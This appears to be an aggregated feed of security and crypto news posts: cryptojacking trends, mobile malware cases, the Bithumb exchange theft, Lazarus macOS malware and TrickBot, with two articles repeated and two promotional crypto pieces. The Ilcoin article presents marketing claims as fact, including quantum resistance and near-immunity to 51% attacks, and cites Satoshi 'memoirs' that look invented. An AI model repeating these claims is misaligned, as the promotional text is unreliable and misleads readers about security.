X-Force research saw an explosion of cryptojacking activity in 2018, with cryptojacking attacks far exceeding all other forms of coin theft attacks.

Some of this rise in browser-based cryptojacking comes from unintended sources, such as vendors who sell cryptojacking scripts as an alternative to running advertisements on websites. The initial purpose is legitimate, but they can also be used by attackers who run them on compromised websites. One of the largest providers of mining scripts of that type was Coinhive, an organization that pioneered the sale of these scripts. As a result of frequent use of Coinhive scripts in cryptojacking attacks, users and security professionals would often see the name “Coinhive” or “Coinhive.Miner” appear as a malicious issue. In March 2019, Coinhive voluntarily ceased operations.

2018 Cryptojacking attacks by type

Figure 1: Cryptojacking attacks exceeded malware cryptomining attacks by a nearly 2-1 ratio in 2018 (source: IBM X-Force)

Cryptojacking Was Big in 2018, So Why Shift to Cryptomining Malware in 2019?

As our data shows, browser-based cryptojacking was big in 2018. But as we moved into 2019, our data started showing a decline in that type of attack and a return to malware-based cryptojacking. A number of factors could be contributing to this shift.

One possibility is that the recent drop in cryptocurrency prices has made mining in the browser less profitable. Since the browser is merely an application on a device, it cannot generate the same computing power as infecting the actual device. As a result, this type of cryptojacking takes much longer to generate each coin, which may be incentivizing threat actors to refocus on malware infections to speed things up.

Additionally, sharply reduced cryptocurrency value could encourage actors to move to an entirely different revenue stream, causing cryptomining malware to have a higher proportion of activity even though nominal levels may have dropped.

Threat actors could also be temporarily shifting away from browser-based cryptojacking if they relied on Coinhive to provide them with scripts. With Coinhive gone, threat actors would have to go to other script providers. While there are many other providers of the same sort of scripts, the removal of Coinhive could affect the overall ability of the technically unskilled to create web-based cryptojacking attacks.

Don’t rejoice just yet — browser-based cryptojacking may see a resurgence in the near future due to the recent and sharp drop in the Monero hash rate. A reduced hash rate makes mining each coin less computationally intensive, making cryptojacking a more profitable option despite its lower harvesting power.

Which Should I Worry About More: Browser-Based Cryptojacking or Cryptomining Malware?

The short answer is both. X-Force data indicates that while browser-based cryptojacking was increasingly popular through most of 2018, cryptomining malware made a resurgence at the end of 2018 and into the first quarter of 2019.

The rise and fall of cryptojacking popularity

Figure 2: IBM X-Force data showing the rise and fall of cryptojacking popularity (source: IBM X-Force)

Browser-based cryptojacking was very popular with threat actors earlier in 2018, likely due to the following factors:

  • Without having to use malware and maintain a botnet, browser-based attacks can be easier for cybercriminals to set up compared to other forms of cryptomining attacks.
  • Threat actors needed only to infect a single web server to deploy a cryptojacking script to all visitors of that site and any other sites hosted thereon.
  • Cryptojacking is tougher for organizations to mitigate than cryptomining malware, since the infection occurs outside the organization on an unaffiliated server and takes advantage of users browsing to a compromised resource. In most cases, when the company’s security team sees alerts for mining activity, there isn’t much it can do to clean up within the company’s own devices. While one could notify the web server’s owner of the compromise, they may not know what to do about it or fail to address the issue.
  • With browser-based cryptojacking, a threat actor can forego wide-cast infection campaigns and the need to infect myriad devices. Instead, they aim to compromise a few web servers and expect to reach untold numbers of site visitors.

Cryptojacking attacks by type

Figure 3: Browser-based cryptojacking resides outside an organization’s zone of control (source: IBM X-Force)

Some Tips for Defenders

Malicious cryptomining and browser-based cryptojacking attacks are plentiful, but they are not impossible to defend against. Here are some tips for defenders from our X-Force IRIS threat intelligence specialists:

  • Engage in a thorough risk assessment to determine the acceptable risk appetite for malicious cryptomining activity for the organization.
  • Restrict outbound calls to cryptomining pools to help detect and prevent cryptomining within the organization’s environments.
  • Where feasible, disable JavaScript in browsers to directly prevent cryptojacking scripts from executing.
  • Update host-based detection signatures to include the latest cryptomining malware and, if possible, alert on significantly anomalous processor activity that may be indicative of ongoing cryptomining malware infections.
  • Continue updating intrusion detection and prevention system (IDS/IPS) signatures to help block the latest cryptojacking scripts.
  • Work closely with network security operations to block traffic to and from known cryptojacking addresses that can be obtained from a threat intelligence provider or maintained internally.
  • Educate stakeholders on the difference between browser- and device-based cryptojacking to facilitate better informed conversations on the organization’s cybersecurity posture.

Join X-Force Exchange to stay up to date on cryptojacking campaigns


The post Cryptojacking Attacks: Who’s Mining on Your Coin? appeared first on Security Intelligence.

Hard Times for Cryptojacking

By David Balaban

What is Cryptojacking? It is an attack in which hackers secretly utilize the computing power of your device to mine cryptocurrency – The cybercrime climate is flexible enough to quickly adapt to new circumstances and trends. The fact that cryptocurrency markets skyrocketed in the past several years has encouraged malicious actors to find ways of getting on […]

This is a post from HackRead.com Read the original post: Hard Times for Cryptojacking

Preparing for the Unpredictable: Security in a New World of Mobile Malware

Mobile malware is nothing new. But in recent months, attackers have been getting more creative and resourceful with how they conceal, distribute and deploy these threats.

This newfound creativity is part of a mobile threat trend that can be summarized as follows: Attacks are on the rise, they’re focusing on mobile devices and they’re getting far more aggressive with their methods.

Mobile Threats by the Numbers

The numbers are staggering. Kaspersky Lab’s “Mobile Malware Evolution 2018” report found that the number of devices attacked by malware increased from 66.4 million in 2017 to 116.5 million in 2018 — and we should assume another big rise for 2019. The researchers also found that the “quality” of malware — its precision and impactfulness — is on the rise. The number of so-called “Trojan-droppers” — malware that gets past security to deliver its payload — doubled from 2017 to 2018, according to the report.

In its most recent “Mobile Threat Report,” McAfee detailed how mobile phones are being increasingly targeted with mobile app backdoors, banking Trojans and cryptomining malware. One alarming trend is the number of fake apps appearing in dozens of app stores, raising from around 10,000 fake apps in the middle of 2018 to approximately 65,000 by the end of the year.

In addition, Verizon’s most recent “Mobile Security Index 2019” found that a majority of those surveyed believed their organization is at risk of mobile threats. One-third of companies reported suffering a compromise that involved mobile devices. Despite this, more than half said they had sacrificed security to “get the job done.” An incredible 81 percent of respondents said they had personally used insecure public WiFi for work, despite knowing that the practice is both unsafe and prohibited by company policy.

All this is to say that the threat from mobile devices is increasing at an extremely high rate, yet most organizations are woefully unready.

A New World of Mobile Malware

All that data around the rising threat of mobile-based attacks doesn’t fully address the quality of the latest malware. Just look at the creative thinking behind a recent incarnation of malware called Anubis.

Anubis’ Motion-Based Evasion Tactics

Distributed inside at least two apps available on the Google Play store, Anubis banking malware concealed itself using the target phones’ motion sensors. Researchers often use emulators to hunt for Trojans in apps — or they search on real phones, which are often mounted and motionless. The Anubis creators figured out that one difference between security researchers and real-life users is motion. By activating only after motion was detected, the malware could remain invisible to many researchers but still activate on phones in the wild.

Trend Micro reported in January that the motion-activated Anubis appeared in two seemingly legitimate apps: a battery extender app with a 4.5-star rating and a currency converter. Once activated, Anubis installed a keylogger for stealing credentials or took screenshots for the same purpose.

Preinstalled Mobile Malware

Downloading apps is one way to sneak malware onto phones. Preinstalling it is another. The technology firm Upstream discovered in January that the Alcatel smartphone models Pixi 4 and A3 Max contained malware out of the box. The malware was hidden in a preinstalled weather app called Weather Forecast-World Weather Accurate Radar. The app was also available separately on the Google Play store and was downloaded more than 10 million times. It has since been removed.

The malware collected various bits of data, such as location data, user email addresses and International Mobile Equipment Identity (IMEI) numbers and may have loaded adware. It also subscribed users to a for-pay phone number service.

Clipper Malware on Google Play

Another unwelcome trend is the appearance of older methods of compromise in legitimate app stores. For example, the first clipper malware ever discovered on the official Google Play store was found by the security company ESET in February: Android/Clipper.C. Previously, clipper malware was the exclusive province of desktop PCs or unauthorized app stores.

Clipper apps replace the clipboard contents of a device with other data. For example, a clipper app might switch the account for a deposit during a cryptocurrency transaction, redirecting the transaction to the attacker’s account.

In addition, Android/Clipper.C attempted to nab credentials and private keys and send them to the attacker’s Telegram account to steal Ethereum funds, but it could also replace either an Ethereum or a bitcoin wallet address.

Attack Campaigns on a Massive Scale

Yet another new trend is that some malware is being distributed on a massive scale. Some 150 million Android users were impacted recently by malware called SimBad. The malware disguises itself as advertising, according to Check Point, mostly inside a large number of mobile games.

In fact, SimBad carries out phishing attacks that lead users to websites where even more malware is downloaded. Once launched, SimBad is difficult to stop or uninstall. Apps containing the SimBad malware have since been removed from the store.

Distributing Malware via Image Files

Malware can even be smuggled onto a phone without apps. A new Android bug enabled a standard photo file format to serve as the vehicle for an attack. Google discovered the method, fixed it with a February patch, then described it in a security bulletin. The flaw enabled hacks of Android smartphones via PNG files by way of a purpose-built PGN that could execute code. It’s worth noting that the vast majority of Android phones are not updated frequently and did not get the patch quickly.

What Can We Do to Combat Creative New Malware Strains?

The bottom line is that mobile malware techniques to compromise security cannot be easily predicted. What can be predicted is that threats will continue to rise, new methods will continue to be devised and mobile devices will continue to be the focus of intense malware activity.

The point of all this is not to guard specifically against the examples in this article, but to understand the growing threat — and reflect on the fact that far too many organizations are unprepared. So what can they do to prepare for the unpredictable?

To get started, here are some mobile security best practices and policies to follow and enforce:

  • Keep devices current with the latest updates.

  • Stick to official and authorized app stores. While many of the threats reported here actually appeared on the official Google Play store, it’s important to note that affected apps are removed immediately once discovered. The same can’t be said for unauthorized sources for mobile apps.

  • Minimize the number of apps installed and favor reputable app developers.

  • Embrace a comprehensive approach to mobile security that can protect against even unreported or unpredicted threats.

  • Understand that some of the newest threats can only be stopped with powerful artificial intelligence-based tools.

  • Improve and enforce policies against using public WiFi and in favor of using good password management.

Nobody can predict how creative new malware methods will infiltrate the mobile devices used by employees at your organization. But it’s easy to predict that these attempts will be made. Security decision-makers can no longer think about these threats as theoretical or secondary in importance to other work. It’s time to act on what we know is coming: something unpredictable.

The post Preparing for the Unpredictable: Security in a New World of Mobile Malware appeared first on Security Intelligence.

DApps Are Set to Hit the Mainstream, All Thanks to LiquidApps

Introduction

When Bitcoin debuted in 2009 after the global financial meltdown; many people made bold predictions about it being the future of money. The underlying Blockchain technology that powered Bitcoin started getting attention after Ethereum debuted in 2013. It wasn’t long before tech enthusiasts were forecasting a decentralized world powered by DApps – until the crypto bull run ended in 2017.

The mass market adoption of decentralized applications has been frustrated by several technical challenges. Some of those challenges relates to scalability, speed, and transaction costs on Blockchain networks. Critics of Blockchain technology are often quick to note that many of its potential applications are merely ideas stuck in whitepapers and landing pages. Unfortunately, Blockchain technology will continue to be criticized until it gains practical applications beyond cryptocurrencies.

DApps have had many interesting starts but the aforementioned trio of problems often surface to cripple its growth. This piece examines how a new project, LiquidApps might make it easier for developers to bring their DApps to the mainstream markets.

Introducing LiquidApps and its plan to fix the problem with DApps

Beni Hakak and Tal Muskal used to work part of a team developing a protocol to solve the liquidity problem on Ethereum. It wasn’t long before they discovered the fundamental scalability issues that was constraining Ethereum. Hence, they started exploring EOS as an alternate hub for decentralized applications.

Their forays into the latent potential of EOS led them to create LiquidEOS as a Block Producer for EOS. While running LiquidEOS they observed that many developer teams were struggling to scale their DApps efficiently at an affordable cost. It became obvious that EOS might not reach its true potential if the problems associated with the cost of network resources persist.

Now, they’ve founded LiquidApps as a platform to launch a range of products that will help developers to build and launch DApps with affordable efficiency and effectiveness. With LiquidApps, DApp developers on EOS mainnet have the potential to access extra storage capacity, secure communication services, and other critical utilities that could make the development of dApps substantially easier and more affordable.

Here’s how LiquidApps will help DApps unlock growth at scale

  • An innovative vRAM System

One of the key selling points of EOS Blockchain is its zero transaction cost – it sounds great from a PR perspective but the reality is that transaction fees still needs to be paid somehow. What EOS did was to push the transaction fees away from users to the developers building DApps. Hence, developers are required to pay for resources such as RAM and CPU to keep their DAPps operational. Since Q4 2018, developers have had to contend with the rising cost of RAM on EOS. A single MB of RAM costs about $200 in EOS and you can do the maths on how much it would cost to deploy a DApp that required several gigabytes of RAM.

LiquidApps’ vRAM System is an alternative storage solution for EOS developers, which allows them to migrate relevant data from RAM to IPFS files hosted by its DAPP Service Providers. vRAM makes it easier for developers to access RAM resources by helping them unpack their RAM databases. The best part is that LiquidApps has its own tokenomics that prevents the cost of vRAM from rising beyond the level of affordability for developers.

Interestingly, if vRAM succeeds in helping developers launch DApps more effectively, the demand for EOS RAM will drop to ultimately trigger a decline in the price of RAM on the blockchain. Hence, vRAM provides a sustainable solution to fix the rising RAM costs that has delayed the mainstream adoption of DApps.

  • The future is plural with DAPP Service Providers (DSPs)

The second module in LiquidApps’s solution for refining the DApps development process is its DApp Service Provider (DSPs) network. The DSPs could be an individual or organization interested in facilitating the development of DApps of EOS by providing standard API endpoint on the EOS blockchain. Some of their activities also include providing warm-ups, data indexing for selected datasets, and the creation of custom external services.

DSPs also retain autonomy over the operations of their businesses, and they can offer customized data packages in line with their own service level agreements.

DSPs is an innovative solution for stakeholders to play strategic roles in the EOS ecosystem and provide services to dApp developers that will allow them to optimize their application development processes. DSPs are in turn rewarded through predefined tokenomics of the DApp Token Distribution Mechanism.

  • Leveraging its DAPP Network System Model

The DAPP Network functions as a second layer on top of EOS Mainnet to power a suite of solutions solving resource scarcity issues that currently severely limit development on EOS.

The structure of the Internet has websites; layered on web services; layered on ISPs and Cloud; which are in turn layered on HTTP, TCP, and IP.

On the Blockchain, DApps will be the gateways through whihc people interact with decentralized services the same way websites provide access to services on the Internet. The DApp Network System allows DApps to be layered on LiquidApps; which are in turn layered on BPs and Miners; which are in turn layered on protocol blockchains such as EOS and Ethereum.

Conclusion

LiquidApp is serious about fixing the systemic problems frustrating the development of DApps. While the last several months have been focused on vRAM and other modules, the second half of the year will host the launch of vCPU. Solving the RAM and CPU challenges should make it easier for developers to launch DApps at affordable costs that makes them attractive enough to trigger a mass-market adoption.

Will LiquidApps succeed in fixing the problems with DApps? It’s bit early to make such a prediction. Does LiquidApps have a decent shot at getting DApps on the path to mass-market adoption? The answer is a resounding YES!

The post DApps Are Set to Hit the Mainstream, All Thanks to LiquidApps appeared first on TechWorm.

Inside job: Bithumb crypto exchange hacked again; loses $20 million

By ghostadmin

This is the third time that Bithumb has been hacked to steal millions in cryptocurrency. Crypto industry is being hammered by cybercriminals with full frequency lately. There are reports of a new attack against South Korean bitcoin exchange called Bithumb due to which the exchange got hacked. The attack occurred on the morning of Saturday. This […]

This is a post from HackRead.com Read the original post: Inside job: Bithumb crypto exchange hacked again; loses $20 million

Bithumb Crypto Exchange Hacked For The Third Time In Consecutive Years

The year 2019 marks the third consecutive year of a hack for the Korean cryptocurrency exchange Bithumb! Once again, the

Bithumb Crypto Exchange Hacked For The Third Time In Consecutive Years on Latest Hacking News.

Hackers stole $19 Million from Bithumb cryptocurrency exchange

A new cyber heist made the headlines, the victim is Bithumb,
the South Korea-based cryptocurrency exchange and hackers stole $19 Million.

Hackers have stolen nearly $19 million worth of cryptocurrency from Bithumb, the South Korea-based cryptocurrency exchange.

The news was first reported by the Primitive Ventures’ Dovey Wan, hackers compromised a number of Bithumb’s hot EOS and XRP wallets and transferred around 3 million EOS (roughly $13 million) and 20 million XRP (~ $6 million) to accounts under their control.

Then crooks transferred the stolen funds to multiple accounts they operated on other cryptocurrency exchanges, including Huobi, HitBTC, WB, and EXmo, via ChangeNow, a non-custodial crypto swap platform that
has no maximum amount for crypto exchange.

Once the attack was discovered, Bithumb quickly halted its deposits and withdrawals process, the company also speculated that the incident allegedly involved insiders.

“About 10:15 pm on the 29th, we detected abnormal withdrawal of the company’s cryptocurrency through Bithumb’s abnormal trading monitoring system.” reads a statement published by the exchange.

“All the spilled cryptocurrency is owned by company, and all the member’s asset is under the protection of cold wallet.

According to the company’s manual, Bithumb secured all the cryptocurrency from the detection time with a cold wallet and checked them by blocking deposit and withdrawal service.

As a result of the internal inspection, it is judged that the incident is an “accident involving insiders”.”

Bithumb is conducting an intensive investigation along with KISA, Cyber Police Agency and security companies.

Bithumb was hacked multiple times in the past two years. In June 2018,
the South Korean cryptocurrency exchange confirmed that hackers stole 35 billion won ($31.6 million) worth of cryptocurrency between June 19 and June 20. In July 2017 hackers have stolen more than $1 Million in Bitcoin and Ether cryptocurrencies from the accounts of several users of the exchange.

Changpeng Zhao, CEO of Binance cryptocurrency exchange, posted an interesting representation of the way the attackers have distributed his funds after stealing it from Bithumb.

The attackers have stolen the private key for the EOS hot wallet account belonging to Bithumb (g4ydomrxhege) and used it to transfer the funds to the address “ifguz3chmamg” under their control.

“We deeply apologize to our members for delaying the cryptocurrency deposit and withdrawal service,” Bithumb said.

Bithumb is currently working with major cryptocurrency exchanges and foundations in the attempt of recovering the stolen crypto coins.

Pierluigi Paganini

(SecurityAffairs – cryptocurrency, hacking)

The post Hackers stole $19 Million from Bithumb cryptocurrency exchange appeared first on Security Affairs.

Security Affairs: Hackers stole $19 Million from Bithumb cryptocurrency exchange

A new cyber heist made the headlines, the victim is Bithumb,
the South Korea-based cryptocurrency exchange and hackers stole $19 Million.

Hackers have stolen nearly $19 million worth of cryptocurrency from Bithumb, the South Korea-based cryptocurrency exchange.

The news was first reported by the Primitive Ventures’ Dovey Wan, hackers compromised a number of Bithumb’s hot EOS and XRP wallets and transferred around 3 million EOS (roughly $13 million) and 20 million XRP (~ $6 million) to accounts under their control.

Then crooks transferred the stolen funds to multiple accounts they operated on other cryptocurrency exchanges, including Huobi, HitBTC, WB, and EXmo, via ChangeNow, a non-custodial crypto swap platform that
has no maximum amount for crypto exchange.

Once the attack was discovered, Bithumb quickly halted its deposits and withdrawals process, the company also speculated that the incident allegedly involved insiders.

“About 10:15 pm on the 29th, we detected abnormal withdrawal of the company’s cryptocurrency through Bithumb’s abnormal trading monitoring system.” reads a statement published by the exchange.

“All the spilled cryptocurrency is owned by company, and all the member’s asset is under the protection of cold wallet.

According to the company’s manual, Bithumb secured all the cryptocurrency from the detection time with a cold wallet and checked them by blocking deposit and withdrawal service.

As a result of the internal inspection, it is judged that the incident is an “accident involving insiders”.”

Bithumb is conducting an intensive investigation along with KISA, Cyber Police Agency and security companies.

Bithumb was hacked multiple times in the past two years. In June 2018,
the South Korean cryptocurrency exchange confirmed that hackers stole 35 billion won ($31.6 million) worth of cryptocurrency between June 19 and June 20. In July 2017 hackers have stolen more than $1 Million in Bitcoin and Ether cryptocurrencies from the accounts of several users of the exchange.

Changpeng Zhao, CEO of Binance cryptocurrency exchange, posted an interesting representation of the way the attackers have distributed his funds after stealing it from Bithumb.

The attackers have stolen the private key for the EOS hot wallet account belonging to Bithumb (g4ydomrxhege) and used it to transfer the funds to the address “ifguz3chmamg” under their control.

“We deeply apologize to our members for delaying the cryptocurrency deposit and withdrawal service,” Bithumb said.

Bithumb is currently working with major cryptocurrency exchanges and foundations in the attempt of recovering the stolen crypto coins.

Pierluigi Paganini

(SecurityAffairs – cryptocurrency, hacking)

The post Hackers stole $19 Million from Bithumb cryptocurrency exchange appeared first on Security Affairs.



Security Affairs

Hackers Steal $19 Million From Bithumb Cryptocurrency Exchange

Hackers yesterday stole nearly $19 million worth of cryptocurrency from Bithumb, the South Korea-based popular cryptocurrency exchange admitted today. According to Primitive Ventures' Dovey Wan, who first broke the information on social media, hackers managed to compromise a number of Bithumb's hot EOS and XRP wallets and transferred around 3 million EOS (~ $13 million) and 20 million XRP (~

How Chris Thomas Paired His Passion for Blockchain With Pen Testing

Chris Thomas, X-Force Red’s blockchain security expert, has always had an interest in understanding how technologies are built and operated. As a young child, Chris’ father thought it would be enjoyable for the two to build a computer instead of buying a premanufactured one. After two attempts, the father-and-son duo successfully built Chris’ first computer. Little did they know the project would ignite Chris’ future career as a penetration tester.

At just 11 years old, Chris performed his first penetration test, hacking into his school’s network. The content of his school’s information technology class wasn’t challenging for Chris, giving him plenty of time to teach himself how to program and code. Using his self-taught knowledge, he was able to scan the school’s network and access window shares that allowed him to log in as a domain administrator. Because he has a strong moral compass, Chris communicated his findings with the school’s system administrator, who became a close ally and supported Chris’ work. Through this experience, Chris knew he wanted to become a penetration tester.

Starting a Career in Penetration Testing

After secondary school, Chris pursued and completed an undergraduate degree in programming and a graduate degree in cybersecurity. He then began his first full-time job working as a system administrator for a large technology company in Manchester, England. Chris’ knowledge was second to none, but his employer would not let him begin his career as a penetration tester with the company. It was not until Chris alpha tested and passed the CREST CRT exam that his company moved him to a junior penetration tester position.

Over the next 10 years, Chris excelled in his role as a penetration tester and became a principal consultant, serving as the technical lead on a project for a large financial institution. He and his team managed the company’s global penetration testing network and built the network access controls from scratch. In the midst of that project, Chris met Thomas MacKenzie, who is now X-Force Red’s associate partner in Europe, the Middle East and Africa.

Joining the X-Force Red Team

Chris has always been infatuated with blockchain technology since its inception and initial ties to cryptocurrency. With a passion for understanding how systems work and function, he immediately educated himself on all things blockchain and bitcoin and has continued researching and tinkering with the technologies ever since.

When Thomas joined X-Force Red, he contacted Chris about his interest in joining the team as well. Thomas knew Chris had a strong interest in blockchain and reminded him that IBM was one of the industry leaders in developing new blockchain technology. Thomas suggested that Chris become X-Force Red’s leading blockchain testing expert, an opportunity Chris accepted without hesitation.

In his current role, leading X-Force Red’s blockchain testing services, Chris combines his passion for penetration testing with his love for blockchain. The team works with clients to find weaknesses not only in the implementation and use of blockchain technology itself, but also in the connected infrastructure.

Alongside X-Force Red’s veteran hackers, who are also developers and engineers, Chris is excited to help shape the adoption and implementation of blockchain across various industries.

Learn more about X-Force Red Blockchain Testing

The post How Chris Thomas Paired His Passion for Blockchain With Pen Testing appeared first on Security Intelligence.

Security Affairs: Lazarus APT continues to target cryptocurrency businesses with Mac malware

North Korea-linked Lazarus group made the headlines again, it has been leveraging PowerShell to target both Windows and macOS machines.

The North Korea-linked Lazarus APT group made has been leveraging PowerShell to target both Windows and macOS machines in a new wave of attacks.

The discovery was made by experts at Kaspersky Lab, the campaign has been ongoing since at least November 2018, Kaspersky Lab reports.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFTattacks in 2016, and the Sony Pictures hack.

In 2018, the Lazarus APT group targeted several cryptocurrency exchanges, including the campaign tracked as Operation AppleJeus discovered in August 2018. At the time, North Korea-linked Lazarus APT group leveraged for the first time on a MacOS variant of the Fallchill malware.

Experts at Kaspersky believe the threat actors continued to work on MacOS malware to expand their operations.

The APT group leveraged custom PowerShell scripts to control Mac malware.

“They have developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator. The C2 server script names are disguised as WordPress (popular blog engine) files as well as those of other popular open source projects.” reads the analysis published by Kaspersky Lab. “After establishing the malware control session with the server, the functionality provided by the malware includes set sleep time (delay between C2 interactions), exit malware, collect basic host information, check malware status, show current, malware configuration, update malware configuration, execute system shell command, and download & upload files”

azarus-cryptocurrency-businesses

Lazarus hackers leveraged both compromised and purchased servers to arrange their campaign, experts discovered servers from China and the European Union that were hosting the macOS and Windows payloads. Threat actors seem to use rented servers to host malware, while they hosted the C&C scripts on compromised servers.

The malware was distributed through documents that were crafted to attract the attention of cryptocurrency professionals, the APT group appears to be focused on organizations in South Korea.

According to Kaspersky Lab, the development team behind the macOS malware is the same that created other malicious codes used in other campaigns associated with Lazarus.

“We’d therefore like to ask Windows and macOS users to be more cautious and not fall victim to Lazarus. If you’re part of the booming cryptocurrency or technological startup industry, exercise extra caution when dealing with new third parties or installing software on your systems.” Kaspersky says. 

“It’s best to check new software with an antivirus or at least use popular free virus-scanning services,”

Further technical details, including Indicators of Compromise, are reported in the analysis published by Kaspersky Lab.

Pierluigi Paganini

(SecurityAffairs – Lazarus, cryptocurrency)

The post Lazarus APT continues to target cryptocurrency businesses with Mac malware appeared first on Security Affairs.



Security Affairs

Lazarus APT continues to target cryptocurrency businesses with Mac malware

North Korea-linked Lazarus group made the headlines again, it has been leveraging PowerShell to target both Windows and macOS machines.

The North Korea-linked Lazarus APT group made has been leveraging PowerShell to target both Windows and macOS machines in a new wave of attacks.

The discovery was made by experts at Kaspersky Lab, the campaign has been ongoing since at least November 2018, Kaspersky Lab reports.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFTattacks in 2016, and the Sony Pictures hack.

In 2018, the Lazarus APT group targeted several cryptocurrency exchanges, including the campaign tracked as Operation AppleJeus discovered in August 2018. At the time, North Korea-linked Lazarus APT group leveraged for the first time on a MacOS variant of the Fallchill malware.

Experts at Kaspersky believe the threat actors continued to work on MacOS malware to expand their operations.

The APT group leveraged custom PowerShell scripts to control Mac malware.

“They have developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator. The C2 server script names are disguised as WordPress (popular blog engine) files as well as those of other popular open source projects.” reads the analysis published by Kaspersky Lab. “After establishing the malware control session with the server, the functionality provided by the malware includes set sleep time (delay between C2 interactions), exit malware, collect basic host information, check malware status, show current, malware configuration, update malware configuration, execute system shell command, and download & upload files”

azarus-cryptocurrency-businesses

Lazarus hackers leveraged both compromised and purchased servers to arrange their campaign, experts discovered servers from China and the European Union that were hosting the macOS and Windows payloads. Threat actors seem to use rented servers to host malware, while they hosted the C&C scripts on compromised servers.

The malware was distributed through documents that were crafted to attract the attention of cryptocurrency professionals, the APT group appears to be focused on organizations in South Korea.

According to Kaspersky Lab, the development team behind the macOS malware is the same that created other malicious codes used in other campaigns associated with Lazarus.

“We’d therefore like to ask Windows and macOS users to be more cautious and not fall victim to Lazarus. If you’re part of the booming cryptocurrency or technological startup industry, exercise extra caution when dealing with new third parties or installing software on your systems.” Kaspersky says. 

“It’s best to check new software with an antivirus or at least use popular free virus-scanning services,”

Further technical details, including Indicators of Compromise, are reported in the analysis published by Kaspersky Lab.

Pierluigi Paganini

(SecurityAffairs – Lazarus, cryptocurrency)

The post Lazarus APT continues to target cryptocurrency businesses with Mac malware appeared first on Security Affairs.

TrickBot Creators Collaborate With BokBot to Conduct Man-in-the-Middle Attacks

Security researchers warned that the cybercriminals behind the two banking Trojans are now collaborating to perform man-in-the-middle (MitM) attacks.

On March 17, Crowdstrike discovered a BokBot proxy module called shadDll in conjunction with TrickBot. The code for the two banking Trojans is 81 percent similar, the researchers said, which means the proxy module can be seamlessly integrated into TrickBot’s extensible, modular framework. It’s possible the two threat groups have been collaborating on an ongoing basis, the researchers added.

Adding New Features Through Threat Group Collaboration

After infecting a machine by duping victims into installing malware via phishing messages, TrickBot can use the shadDll module to access networking functions and install illegitimate secure socket layer (SSL) certificates. At this point, it can do many of the things BokBot can do, including intercepting web traffic and redirecting it, taking screenshots to steal personal information, and injecting other malicious code.

The researchers have attributed the BokBot Trojan to a cybercriminal group called Lunar Spider, while TrickBot is believed to have been created by a group called Wizard Spider. TrickBot, which first emerged in late 2016, has proven highly versatile in attacking financial services firms, and Wizard Spider may include members of the group that developed the earlier Dyre malware, according to Crowdstrike.

How to Stay Ahead of TrickBot’s Tricks

The “IBM X-Force Threat Intelligence Index” for 2019 identified TrickBot as the most prevalent financial malware family of last year, representing 13 percent of all campaign activity. This was in part due to the ability of various threat actors to make use of the Trojan’s variants. For example, the report showed that IcedID distributed TrickBot within its own botnet in a 2018 campaign. However, experts noted that proper security controls, regular user education and planned incident response can help keep this threat at bay.

X-Force researchers also discovered that TrickBot has been used to steal cryptocurrency, and distribution of the BokBot module may make it even more popular. Organizations should employ advanced malware protection to receive alerts for high-risk devices and notifications when malware has been detected to ensure this cooperation among cybercriminals doesn’t lead to even deadlier attacks.

The post TrickBot Creators Collaborate With BokBot to Conduct Man-in-the-Middle Attacks appeared first on Security Intelligence.

IlCoin vs Bitcoin – a paradigm shift in the pursuit of technological sustainability

It all happened 10 years ago when someone by the name of Satoshi Nakamoto has posted on the p2pfoundation blog the concept of a decentralized virtual currency, that changed the world of finance forever. This mysterious person was articulating the truth about the current banking system and the serious flaws it has, which must be resolved.  He definitely wanted a better future, where each individual becomes an actual owner of his money, where trust in a currency is not based on the centralization and authority, but rather on a decentralized system where thousands of people support the network and transact value between each other.

According to an excerpt from his last published memoirs, he was designing the decentralized network which could operate on a Proof-of-Work consensus algorithm, applying for the first time solution to Byzantine Generals Problem on a global financial scale. But no technology is perfect, and unfortunately, the PoW algorithm has its implications in the form of 51% attack possibility which allows anyone with sufficient computing power to make cryptocurrency double-spending, transaction reversals and much more. Therefore, in the light of near-future quantum computing inventions, his paradigm of the decentralized and secure network becomes obsolete. That leaves a vast space for projects like Ilcoin to pick-up existing technological legacy and make significant improvements which can robustly serve the future.

Multi-layered Blockchain

From the technological standpoint, Ilcoin was built on SHA-256 algorithm as Bitcoin, but working for 4 years, developers have invented a significantly upgraded version of it called C2P (Command Chain Protocol). The new protocol brings in a separate digital signature next to the hash in each block, and it drops the possibility of a successful 51% attack nearly to zero. The digital signature itself is added by third-level Admiral nodes, which work in tandem with second-level Validator nodes. On top of that, Admiral nodes create separate blocks which contain current and previous digital signatures, and those blocks are united into the separate blockchain which works in a synchronized way with the main one that stores transactions, hashes, and other information. The first-level nodes simply broadcast transactions and store all ledger data, maintaining the network’s integrity.

In comparison, the Bitcoin is vulnerable to artificial block injection, while Ilcoin remains untouched, representing by itself a quantum resistant blockchain. But it’s not only about vulnerabilities, it’s about user experience as well. On August 23, 2017, the Bitcoin network activated the SegWit transition, which marked an essential upgrade of the block-size, which was increased from 1 MB to 2-4 MB per block. Considering the fact that digital signatures take 65% of all Bitcoin ledger data, that was a significant upgrade, which also has reduced the network’s transaction overhead. This checkpoint has allowed users to send more transactions, avoiding excessive network congestion.

On the other hand, Ilcoin has a better technology regarding the block-size that equals to 25 MB per block, much faster transaction speeds that reach 170,000 tx/block, and the possibility to process more than 1 billion transactions daily. Unfortunately, Bitcoin is old technology, and its transaction speeds remain at 7 tx/s for many years, and it’s harder to make any changes when the network is so dependant on a mutually-agreed consensus algorithm. Moreover, by the end of this year, Ilcoin’s smart contracts will be rolled out on the market with the significant potential to overlap many existing projects in terms of functionality and usability.

A Paradigm Shift

